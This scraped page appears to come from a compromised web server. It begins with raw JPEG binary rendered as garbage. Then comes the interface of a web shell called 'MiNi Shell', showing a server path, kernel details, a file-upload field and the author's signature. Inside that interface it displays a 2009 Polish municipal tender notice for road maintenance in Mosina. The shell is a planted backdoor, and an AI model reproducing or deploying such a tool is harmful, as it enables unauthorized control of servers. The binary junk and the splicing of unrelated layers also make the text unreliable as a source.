JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/51792-N-2009.html

<p class="kh_header"><b>Mosina: Bieżące utrzymanie dróg 
na terenie Gminy Mosina w roku 2009</b><br>
<b>Numer ogłoszenia: 51792 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Mosinie , Pl. 20 Października 1, 62-050 Mosina, woj. wielkopolskie, tel. 061 8132251, faks 061 8132941.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosina.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mosina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg 
na terenie Gminy Mosina w roku 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA


1.	Informacje ogólne.

	Przedmiotem zamówienia jest zadanie pod nazwą :Bieżące utrzymanie dróg zarządzanych przez Gminę Mosina w 2009 r

1.1.	Przedmiot zamówienia.

Przedmiotem opisu są wymagania dotyczące bieżącego utrzymania dróg zarządzanych przez Gminę Mosina w 2009 r. obejmujące:

mechaniczne profilowanie i wałowanie dróg gruntowych, żużlowych i tłuczniowych położonych na terenie miasta Mosina oraz na terenie sołectw:, Baranówko - Borkowice, Czapury, Daszewice, Drużyna - Nowinki, Dymaczewo Nowe, Dymaczewo Stare, Krajkowo - Baranowo, Krosno, Krosinko, Mieczewo, Pecna, Radzewice, Rogalin, Rogalinek, Sasinowo, Sowinki, Świątniki, Wiórek, Żabinko
 
1.2.	Zakres stosowania :Szczegółowego Opisu Przedmiotu Zamówienia zwanego dalej OPISEM

OPIS jest stosowany jako dokument przetargowy i kontraktowy przy zlecaniu i realizacji robót wymienionych w p. 1.1.

1.3.	Zakres robót objętych OPISEM

Ustalenia zawarte w niniejszym opisie dotyczą prowadzenia robót bieżącego utrzymania dróg zarządzanych przez Gminę Mosina . Zamawiający przewiduje w ciągu trwania umowy do dnia 15.11.2009 r. realizację następujących rodzajów  robót:
mechaniczne profilowanie i wałowanie dróg gruntowych, żużlowych i tłuczniowych położonych na terenie miasta Mosina (załącznik nr C) oraz na terenie sołectw:, Baranówko - Borkowice, Czapury, Daszewice, Drużyna - Nowinki, Dymaczewo Nowe, Dymaczewo Stare, Krajkowo - Baranowo, Krosno, Krosinko, Mieczewo, Pecna, Radzewice, Rogalin, Rogalinek, Sasinowo, Sowinki, Świątniki, Wiórek, Żabinko (załącznik nr D) z uzupełnieniem ubytków w jezdni materiałem rodzimym 
a)	w okresie wiosennym drogi wymienione w załacznikach nr C i D w terminie od 10 marca do 30.04.2009 r. jako roboty  generalne 
b)	w okresie jesiennym ,od 15 września do 31 października ,drogi zgłoszone Wykonawcy do równania w terminie 10 dni od daty pisemnego zgłoszenia przez Zamawiającego jako roboty interwencyjne.

 UWAGA:

-	Zamawiający nie dopuszcza składania ofert częściowych

-	Podane w załącznikach nr C i nr D ilości asortymentów robót są ilościami szacunkowymi. Zamawiający dopuszcza możliwość obniżenia do 20 % ilości poszczególnych asortymentów robót w zależności od stanu technicznego nawierzchni i potrzeb zamawiającego.

-	Zamawiający dopuszcza udział podwykonawców.
 

1.4.	Ogólne wymagania dotyczące jakości robót.

Wykonawca robót jest odpowiedzialny za jakość zastosowanych materiałów i wykonanych robót oraz ich zgodność z wymaganiami postawionymi w niniejszej specyfikacji i poleceniami zamawiającego.
2.	Sprzęt.
Sprzęt powinien być sprawny technicznie i bezpieczny w użyciu, dostosowany do rodzaju używanego materiału, warunków wykonania oraz zapewniać właściwą jakość wykonania robót.
3.	Transport.
Za organizację i funkcjonowanie transportu odpowiada Wykonawca robót. Używane środki transportowe muszą być sprawne technicznie, bezpieczne w użyciu i gwarantować przewóz materiałów w sposób uniemożliwiający obniżenie ich jakości oraz wykluczać możliwość zanieczyszczenia lub skażenia środowiska. Materiały należy przewozić zgodnie z prawem przewozowym.

Zamawiający nie zapewnia miejsca zaplecza i składowania materiałów. Zastrzega sobie jednak prawo do ewentualnego wykorzystania na własne potrzeby materiałów pochodzących z rozbiórki, z tym że wykonawca odwiezie na swój koszt na magazyn wskazany przez zamawiającego.

4.	Wykonanie robót.

4.1. Oznakowanie robót

Roboty związane z profilowaniem ulic wykonywane są przy istniejącym ruchu lokalnym dlatego bardzo ważne jest poinformowanie użytkowników drogi o długości odcinka, na którym prowadzone są roboty oraz o konieczności przestrzegania specyficznych warunków ruchu. Oznakowanie powinno być zgodne z zatwierdzonym projektem organizacji ruchu na czas prowadzenia robót drogowych opracowanym przez wykonawcę robót.
Za bezpieczeństwo ruchu w obrębie odcinka, na którym wykonywane są roboty, od chwili rozpoczęcia robót aż do oddania nawierzchni do ruchu bez ograniczeń, odpowiedzialny jest kierownik budowy wykonawcy.
Należy uwzględnić, że wykonywanie robót drogowych przy odbywającym się ruchu zawsze stwarza problemy, a prawidłowe oznakowanie odgrywa tu zasadniczą rolę dla bezpieczeństwa ruchu i pracowników wykonujących roboty drogowe. Komplet oznakowania powinien być ustawiony na ok. 1 do 2 godzin przed rozpoczęciem robót. Ze względu na przenośny charakter znaków, a więc szybsze ich zużycie i zabrudzenie, szczególną uwagę należy zwrócić na konieczność ich czyszczenia i odnawiania. 
	Przy wykonywaniu i odbiorze robót ściśle należy przestrzegać warunków podanych w : Specyfikacji technicznej wykonania i odbioru robót.
5.	Odbiór końcowy robót.

5.1.Odbiór  - po wykonaniu robót na danej wiosce  lub okręgu.

W przypadku stwierdzenia wad inspektor nadzoru ustali zakres robót poprawkowych. Roboty poprawkowe Wykonawca prowadzi na swój koszt i w terminie ustalonym odpowiednio przez inspektora nadzoru. W takim przypadku termin odbioru ulegnie przesunięciu i zostanie dokonany po ponownym pisemnym zgłoszeniu przez Wykonawcę gotowości do jego przeprowadzenia.


5.2. Odbiór pogwarancyjny

Odbiór ostateczny robót generalnych wiosennych powinien być dokonany po upływie okresu gwarancyjnego, zgodnie z Umową, na podstawie szczegółowej oceny wizualnej wyglądu zewnętrznego wykonanej   usługi przez nadzór przy udziale wykonawcy.

6.     Podstawa płatności.

Płatność dokonywana będzie na podstawie faktur częściowych  za wykonane roboty na wystawionych przez Wykonawcę w oparciu o protokóły zaawansowania robót wraz kosztorysami powykonawczymi sprawdzonymi przez inspektora nadzoru., zgodnie z warunkami określonymi w umowie.

7.	Zakres opracowania oferty:

Oferta na roboty drogowe  obejmuje:
-	prace pomiarowe, roboty przygotowawcze,
-	oznakowanie zgodnie z opracowanym projektem organizacji ruchu. 
-	przygotowanie i dostarczenie materiałów,
-	wykonanie asortymentów robót wyszczególnionych w zleceniu
-	ochronę znaków przed zniszczeniem do czasu wykonania określonych robót,
-	uprzątnięcie terenu budowy po wykonaniu zleconych prac.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 7.000,00 zł ( siedem tysięcy zł )<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki:
6.1. Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz spełniają warunki określone w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223 poz. 1655z późn. zm. ).
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art.22 ust. 1 pkt 1 u.p z. p.),

2)	posiadają  niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem techniczny i osobami zdolnymi do wykonania zamówienia lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (art. 22 ust. 1 pkt 2 u. p z. p.),


3)	znajdują się sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust. 1 pkt 3u. p z.p.),

4)	nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 u. p. z. P (art. 22 ust. 1 pkt. 4 u. p. z., p.),

6.2. Posiadają uprawnienia do wykonywania określonej działalności lub czynności ,jeśli ustawy nakładają obowiązek posiadania takich uprawnień.
6.3. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj. lub przedstawią  pisemne zobowiązania do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia :
a)	wykonali w okresie ostatnich 5 (pięciu) lat przed dniem wszczęcia postępowania  , a jeżeli okres prowadzenia działalność jest krótszy- w tym okresie , min. 2 (dwie) roboty budowlane odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia, tj. polegające  na remoncie, przebudowie i budowie nawierzchni o wartości nie mniejszej niż 50 tys. zł. netto  każda z nich (bez podatku VAT), 
b)	dysponują lub będą  dysponować osobami zdolnymi do wykonania zamówienia  tj. :
- 1 osobą, posiadającą uprawnienia budowlane w specjalności drogowej do kierowania robotami budowlanymi bez ograniczeń oraz będącą członkiem  właściwej Regionalnej Izby Samorządu Zawodowego,
c)	dysponują w pełni sprawnymi jednostkami sprzętowymi - trzy walce samojezdne i trzy równiarki, niezbędnymi do realizacji przedmiotu zamówienia,.
6.4.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
6.5. Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności   gospodarczej (odpowiedzialność deliktowa), na sumę gwarancyjną nie niższą jak  250 tyś. zł.
6.6.  Udzielą gwarancji na profilowanie i naprawę dróg 3 miesiące.
 
Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą :spełnia - nie spełnia,
w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczegól?nionych w rozdziale VII niniejszej SIWZ. Z treści załączonych dokumentów musi jedno?znacznie wynikać, iż w.w warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy
z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty niezbędne do oceny spełniania powyższych warunków:
W celu potwierdzenia spełniania warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty w formie oryginału lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę lub osobę upoważniona, zgodnie z obowiązującymi u niego zasadami reprezentacji.
7.1.: 
a) Oświadczenie  o spełnieniu warunków określonych zgodnie z art. 22 ust. 1 Ustawy Prawo Zamówieniach Publicznych 
b)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewi?dencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej /wystawiony/e nie wcześniej niż 6 m - cy przed upływem terminu składania ofert  - Załącznik Wykonawcy

UWAGA;
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypo?spolitej Polskiej, zamiast w/w dokumentów, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
 - nie otwarto jego likwidacji ani nie zgłoszono upadłości,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
     Jeżeli w kraju w którym Wykonawca ma siedzibę lub miej?sce zamieszkania, nie wydaje się dokumentów, o których mowa w powyższej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariu?szem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowe?go lub gospodarczego odpowiednio kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zaświadczenie takie nie może być wystawione wcześniej niż 6 miesięcy przed upływem terminu składania ofert. /zgodnie z §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów  jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605)/.
7.2. Wykaz wykonanych robót budowlanych w okresie ostatnich 5 (pięciu) lat przed dniem wszczęcia postępowania  , a jeżeli okres prowadzenia działalność jest krótszy- w tym okresie , min. 2 (dwie) roboty budowlane odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia, tj. polegające  na remoncie, przebudowie i budowie nawierzchni o wartości nie mniejszej niż 50 tys. zł. netto  każda z nich , oraz że roboty te  zostały wykonane należycie  -  /zał. nr 3/ 
7.3. Wykaz osób , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia  potwierdzający , że min 1 osoba posiada uprawnienia budowlane  w specjalności drogowej do kierowania robotami budowlanymi bez ograniczeń oraz będącymi członkami właściwej Regionalnej Izby Samorządu Zawodowego - /zał. nr 4/ oraz pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia , jeżeli w wykazie , o którym mowa w pkt  7.3  Wykonawca wykazał osoby , którymi będzie dysponował 
7.4. Wykaz niezbędnego do wykonania narzędzi i urządzeń , którymi dysponuje  lub będzie dysponował Wykonawca  ,- /zał. nr 5 / , oraz pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń  , jeżeli w wykazie , o którym mowa w pkt  7.4  Wykonawca wykazał narzędzia i urządzenia  , którymi będzie dysponował .
7.5. Wykaz prac, które Wykonawca zamierza powierzyć Podwykonawcom /wypełniany w przypadku zlecania określonych prac Podwykonawcom/ - /zał. nr 6/
7.6. Informacji  banku lub spółdzielczej kasy oszczędnościowo - kredytowej , w których Wykonawca posiada rachunek  potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy  ,wystawionej  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert- co najmniej 50 tys. zł - Załącznik Wykonawcy,
7.7 Aktualna polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony
od odpowiedzialności cywilnej, na kwotę nie niższą niż  150 tys. zł.  - Załącznik Wykonawcy.
UWAGA:
Wszystkie dokumenty, o których mowa w pkt. VII niniejszej SIWZ Wykonawca zobowiązany jest złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do podpisywania oferty.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia dokumenty wymienione w pkt. 7.1 a, 7.7 składa przedstawiciel konsorcjum - w imieniu wszystkich jego uczestników  Wykonawców, 
Dokumenty wymienione w pkt. 7.2, 7.3, 7.4, 7.6, 7.8 niniejszej SIWZ mogą być spełnione przez każdego z Wykonawców bądź wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mosina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mosinie
pl. 20 Października 1 
62-050 Mosina.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2009 godzina 10:55, miejsce: Urząd Miejski w Mosinie
pl. 20 Października 1 
62-050 Mosina
pok.107.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com